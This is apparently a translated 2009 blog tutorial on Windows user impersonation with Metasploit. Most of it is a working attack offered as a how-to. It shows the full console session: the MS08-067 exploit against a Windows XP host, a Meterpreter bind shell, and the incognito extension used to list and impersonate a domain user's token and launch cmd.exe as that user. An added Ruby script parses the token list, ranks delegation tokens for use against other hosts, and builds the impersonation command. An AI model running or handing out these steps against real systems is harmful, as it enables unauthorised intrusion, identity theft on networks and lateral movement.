User Impersonation
[Metasploit By: Shell Root]
Here we will see how to impersonate an existing user of the system without having to create a new user with administrator rights.
First we get onto the machine with the exploit exploit/windows/smb/ms08_067_netapi. Rcart's post (linked below) uses the payload windows/vncinject/bind_tcp; here we use windows/meterpreter/bind_tcp instead, because the incognito extension runs inside Meterpreter and is not available from a plain shell or VNC payload. I won't explain the exploit itself, because that is what this POST by my friend Rcart is for:
http://foro.portalhacker.net/index.php/topic,93233.0.html
_ _ _ _
| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
| |
|_|
=[ metasploit v3.3.2-release [core:3.3 api:1.0]
+ -- --=[ 462 exploits - 219 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
=[ svn r7808 updated 16 days ago (2009.12.10)
Warning: This copy of the Metasploit Framework was last updated 16 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://dev.metasploit.com/redmine/projects/framework/wiki/Updating
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3
RHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:Spanish
[*] Selected Target: Windows XP SP2 Spanish (NX)
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.2:4661 -> 192.168.0.3:4444)
meterpreter >
Once the Meterpreter session is open, load the incognito extension with use incognito:
meterpreter > use incognito
Loading extension incognito...success.
meterpreter >
Let's look at the commands it provides:
meterpreter > help
Incognito Commands
==================
Command Description
------- -----------
add_group_user Attempt to add a user to a global group with all tokens
add_localgroup_user Attempt to add a user to a local group with all tokens
add_user Attempt to add a user with all tokens
impersonate_token Impersonate specified token
list_tokens List tokens available under current user context
snarf_hashes Snarf challenge/response hashes for every token
meterpreter >
We will use the list_tokens command. First, let's see which parameters it takes:
meterpreter > list_tokens
Usage: list_tokens <list_order_option>
Lists all accessible tokens and their privilege level
OPTIONS:
-g List tokens by unique groupname
-u List tokens by unique username
meterpreter >
Now list the tokens present on the system, grouped by unique user name. This is not the list of all accounts on the machine: incognito only shows tokens held by running processes and threads, which is why the output contains the built-in service accounts plus the logged-on domain user COLTEJER\ServerColtejer and nothing else. Delegation tokens can be used locally and to authenticate to other hosts as that account; impersonation tokens only allow local actions:
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
COLTEJER\ServerColtejer
NT AUTHORITY\Servicio de red
NT AUTHORITY\SERVICIO LOCAL
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
meterpreter >
Now comes the moment to impersonate a user. The backslash in the account name is doubled because the Meterpreter console treats a single backslash as an escape character:
meterpreter > impersonate_token COLTEJER\\ServerColtejer
[+] Delegation token available
[+] Successfully impersonated user COLTEJER\ServerColtejer
meterpreter >
Open a console (remote shell) as the impersonated user, in this case COLTEJER\ServerColtejer. The -t flag tells execute to start the process with the thread token we are currently impersonating; without it cmd.exe would run with the session's original primary token (SYSTEM here). You can confirm which identity the session is using at any point with getuid.
meterpreter > execute -f cmd.exe -i -t
Process 1528 created.
Channel 1 created.
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
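As an added example (this is not code from the post or from the incognito extension), the following Ruby script parses the text that list_tokens -u prints, ranks the tokens, and builds the impersonate_token command with the backslash correctly doubled. The ranking rule is this example's own assumption: a delegation token for a real user or service account comes first because it can also be used to authenticate to other hosts, built-in delegation tokens (SYSTEM, the service accounts) come next, and impersonation tokens last because they only work locally. The sample text is copied from the session above; the list of built-in authorities is an assumption you should extend for your own environment.

```ruby
# Added example, not part of the original post or of the incognito extension:
# parse the output of `list_tokens -u` and rank the tokens it lists.
# The sample below is copied from the session in the post; the ranking rules
# and the list of built-in authorities are this example's own assumptions.

SAMPLE_LIST_TOKENS = <<~'OUT'
  Delegation Tokens Available
  ========================================
  COLTEJER\ServerColtejer
  NT AUTHORITY\Servicio de red
  NT AUTHORITY\SERVICIO LOCAL
  NT AUTHORITY\SYSTEM

  Impersonation Tokens Available
  ========================================
  NT AUTHORITY\ANONYMOUS LOGON
OUT

# Authorities whose tokens belong to the OS rather than to a user or service
# account of interest (assumption: extend for your environment).
BUILTIN_AUTHORITIES = ['NT AUTHORITY', 'NT SERVICE', 'BUILTIN'].freeze

# Split the output into the two sections incognito prints. Lines under a
# heading that do not look like AUTHORITY\name (for example the text printed
# when a section is empty) are ignored.
def parse_list_tokens(text)
  tokens = { delegation: [], impersonation: [] }
  section = nil
  text.each_line do |raw|
    line = raw.strip
    next if line.empty? || line.start_with?('=')
    if line == 'Delegation Tokens Available'
      section = :delegation
    elsif line == 'Impersonation Tokens Available'
      section = :impersonation
    elsif section && line.include?('\\')
      tokens[section] << line
    end
  end
  tokens
end

def builtin?(token)
  authority, = token.split('\\', 2)
  BUILTIN_AUTHORITIES.include?(authority)
end

# Ranking (assumption): delegation tokens of non-built-in accounts first, since
# they can be used locally and to authenticate to other hosts as that account;
# built-in delegation tokens next; impersonation tokens last (local use only).
def ranked(tokens)
  users, builtins = tokens[:delegation].partition { |t| !builtin?(t) }
  users.map { |t| [t, :delegation_user] } +
    builtins.map { |t| [t, :delegation_builtin] } +
    tokens[:impersonation].map { |t| [t, :impersonation_only] }
end

# Highest-ranked token name, or nil when the output lists no tokens at all.
def best_target(text)
  first = ranked(parse_list_tokens(text)).first
  first && first[0]
end

# The Meterpreter console treats a single backslash as an escape character,
# which is why the post types COLTEJER\\ServerColtejer: double every backslash.
def impersonate_command(token)
  "impersonate_token #{token.gsub('\\') { '\\\\' }}"
end

if __FILE__ == $PROGRAM_NAME
  ranked(parse_list_tokens(SAMPLE_LIST_TOKENS)).each do |token, kind|
    puts format('%-20s %s', kind, token)
  end
  puts impersonate_command(best_target(SAMPLE_LIST_TOKENS))
end
```

Run with ruby on the sample and the first line printed is COLTEJER\ServerColtejer tagged delegation_user, followed by impersonate_token COLTEJER\\ServerColtejer, which is exactly the command typed in the session above. The same parser can be fed the output captured from a real session to pick the target automatically instead of reading the list by eye.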
By: Shell Root
Source: http://shellrootsecurity.blogspot.com/2009/12/suplantacion-de-usuarios.html
Video: http://www.youtube.com/watch?v=NHZlxMyim9s